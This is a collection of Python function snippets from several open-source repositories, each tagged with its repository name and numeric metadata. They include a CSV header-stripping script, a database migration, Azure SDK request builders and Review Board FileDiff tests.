def main(): import csv, os os.makedirs('headerRemoved', exist_ok=True) # Loop through every file in the current working directory. for csvFilename in os.listdir('.'): if not csvFilename.endswith(".csv"): continue # skip non-csv files print("Removing header from " + csvFilename + "...") # Read the CSV file in (skipping first row). csvRows = [] csvFileObj = open(csvFilename) readerObj = csv.reader(csvFileObj) for row in readerObj: if readerObj.line_num == 1: continue # skip first row csvRows.append(row) csvFileObj.close() # Write out the CSV file. csvFileObj = open(os.path.join('headerRemoved', csvFilename), 'w', newline='') csvWriter = csv.writer(csvFileObj) for row in csvRows: csvWriter.writerow(row) csvFileObj.close()
JoseALermaIII/python-tutorials
[ 2, 3, 2, 10, 1475898535 ]
def upgrade(): op.create_table('service_callback_api_history', sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('url', sa.String(), nullable=False), sa.Column('bearer_token', sa.String(), nullable=False), sa.Column('created_at', sa.DateTime(), nullable=False), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('version', sa.Integer(), autoincrement=False, nullable=False), sa.PrimaryKeyConstraint('id', 'version') ) op.create_index(op.f('ix_service_callback_api_history_service_id'), 'service_callback_api_history', ['service_id'], unique=False) op.create_index(op.f('ix_service_callback_api_history_updated_by_id'), 'service_callback_api_history', ['updated_by_id'], unique=False) op.create_table('service_callback_api', sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('url', sa.String(), nullable=False), sa.Column('bearer_token', sa.String(), nullable=False), sa.Column('created_at', sa.DateTime(), nullable=False), sa.Column('updated_at', sa.DateTime(), nullable=True), sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False), sa.Column('version', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['service_id'], ['services.id'], ), sa.ForeignKeyConstraint(['updated_by_id'], ['users.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_service_callback_api_service_id'), 'service_callback_api', ['service_id'], unique=True) op.create_index(op.f('ix_service_callback_api_updated_by_id'), 'service_callback_api', ['updated_by_id'], unique=False)
alphagov/notifications-api
[ 56, 23, 56, 6, 1447855037 ]
def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list_by_subscription_id( self, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_by_subscription_id.metadata['url'] # type: ignore path_format_arguments = { 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list_by_resource_group( self, resource_group_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", accept, 'str') if not next_link: # Construct URL url = self.list_by_resource_group.metadata['url'] # type: ignore path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1), } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} # type: Dict[str, Any] query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str') request = self._client.get(url, query_parameters, header_parameters) else: url = next_link query_parameters = {} # type: Dict[str, Any] request = self._client.get(url, query_parameters, header_parameters) return request
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def setUp(self): super(FileDiffTests, self).setUp() diff = ( b'diff --git a/README b/README\n' b'index 3d2b777..48272a3 100644\n' b'--- README\n' b'+++ README\n' b'@@ -2 +2,2 @@\n' b'-blah blah\n' b'+blah!\n' b'+blah!!\n' ) self.repository = self.create_repository(tool_name='Test') self.diffset = DiffSet.objects.create(name='test', revision=1, repository=self.repository) self.filediff = FileDiff(source_file='README', dest_file='README', diffset=self.diffset, diff64=diff, parent_diff64=b'')
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_set_line_counts(self): """Testing FileDiff.set_line_counts""" self.filediff.set_line_counts( raw_insert_count=1, raw_delete_count=2, insert_count=3, delete_count=4, replace_count=5, equal_count=6, total_line_count=7) counts = self.filediff.get_line_counts() self.assertEqual(counts['raw_insert_count'], 1) self.assertEqual(counts['raw_delete_count'], 2) self.assertEqual(counts['insert_count'], 3) self.assertEqual(counts['delete_count'], 4) self.assertEqual(counts['replace_count'], 5) self.assertEqual(counts['equal_count'], 6) self.assertEqual(counts['total_line_count'], 7) diff_hash = self.filediff.diff_hash self.assertEqual(diff_hash.insert_count, 1) self.assertEqual(diff_hash.delete_count, 2)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_diff_hashes(self): """Testing FileDiff with multiple entries and same diff data deduplicates data """ data = ( b'diff -rcN orig_src/foo.c new_src/foo.c\n' b'*** orig_src/foo.c\t2007-01-24 02:11:31.000000000 -0800\n' b'--- new_src/foo.c\t2007-01-24 02:14:42.000000000 -0800\n' b'***************\n' b'*** 1,5 ****\n' b' int\n' b' main()\n' b' {\n' b'! \tprintf("foo\n");\n' b' }\n' b'--- 1,8 ----\n' b'+ #include <stdio.h>\n' b'+ \n' b' int\n' b' main()\n' b' {\n' b'! \tprintf("foo bar\n");\n' b'! \treturn 0;\n' b' }\n') filediff1 = FileDiff.objects.create(diff=data, diffset=self.diffset) filediff2 = FileDiff.objects.create(diff=data, diffset=self.diffset) self.assertEqual(filediff1.diff_hash, filediff2.diff_hash)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_base_filediff_without_commit(self): """Testing FileDiff.get_base_filediff without associated commit""" filediff = self.create_filediff(self.diffset) self.assertIsNone(filediff.get_base_filediff(base_commit=None))
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_is_symlink_with_false(self): """Testing FileDiff.is_symlink with False""" filediff = self.create_filediff(self.diffset) filediff.extra_data['is_symlink'] = True filediff.is_symlink = False # Explicitly test against the booleans, to avoid truthiness tests. self.assertIs(filediff.is_symlink, False) self.assertIs(filediff.extra_data.get('is_symlink'), False)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_new_symlink_target(self): """Testing FileDiff.new_symlink_target""" filediff = self.create_filediff(self.diffset) filediff.new_symlink_target = 'new/path' self.assertEqual(filediff.new_symlink_target, 'new/path') self.assertEqual(filediff.extra_data.get('new_symlink_target'), 'new/path')
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_new_unix_mode(self): """Testing FileDiff.new_unix_mode""" filediff = self.create_filediff(self.diffset) filediff.new_unix_mode = '0100750' self.assertEqual(filediff.new_unix_mode, '0100750') self.assertEqual(filediff.extra_data.get('new_unix_mode'), '0100750')
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def setUp(self): super(FileDiffAncestorTests, self).setUp() self.set_up_filediffs()
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_full(self): """Testing FileDiff.get_ancestors with minimal=False""" ancestors = {} with self.assertNumQueries(len(self.filediffs)): for filediff in self.filediffs: ancestors[filediff] = filediff.get_ancestors( minimal=False, filediffs=self.filediffs) self._check_ancestors(ancestors, minimal=False)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_no_update(self): """Testing FileDiff.get_ancestors without caching""" ancestors = {} for filediff in self.filediffs: with self.assertNumQueries(0): ancestors[filediff] = filediff.get_ancestors( minimal=True, filediffs=self.filediffs, update=False) self._check_ancestors(ancestors, minimal=True)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_cached_no_filediffs(self): """Testing FileDiff.get_ancestors with cached results when no FileDiffs are provided """ ancestors = {} for filediff in self.filediffs: filediff.get_ancestors(minimal=True, filediffs=self.filediffs) with self.assertNumQueries(5): for filediff in self.filediffs: ancestors[filediff] = filediff.get_ancestors(minimal=True) self._check_ancestors(ancestors, minimal=True)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def build_list_request( subscription_id: str, resource_group_name: str, account_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_get_request( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_create_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, *, json: JSONType = None, content: Any = None, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_update_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, *, json: JSONType = None, content: Any = None, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_delete_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list( self, resource_group_name: str, account_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]